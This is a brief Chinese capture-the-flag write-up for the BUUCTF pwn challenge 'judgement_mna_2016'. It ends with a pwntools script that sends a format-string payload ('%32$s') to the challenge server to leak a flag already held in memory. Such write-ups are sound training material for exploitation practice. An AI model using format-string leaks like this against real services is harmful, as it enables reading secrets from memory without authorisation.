[BUUCTF-pwn]——judgement_mna_2016
还行的一道题, 不过动态调试的时候, 需要你手写一个flag.txt文件, 不然没办法动态调试.
一看就知道这个地方储存的flag,
如果不确定. 可以去看下start函数的汇编, 执行main函数前就已经将flag写入了
下面我们只需要计算偏移输出就好, 记得自己在目录下面写个flag.txt文件, 不然没办法调试的. 偏移0x1c 或者 0x20都可以
exploit
from pwn import *
#p = process('./judgement_mna_2016')
p = remote('node3.buuoj.cn',29011)
#gdb.attach(p, 'b *0x080487A2')
payload = '%32$s' # 28也可以
p.sendlineafter('Input flag >> ',payload)
p.interactive()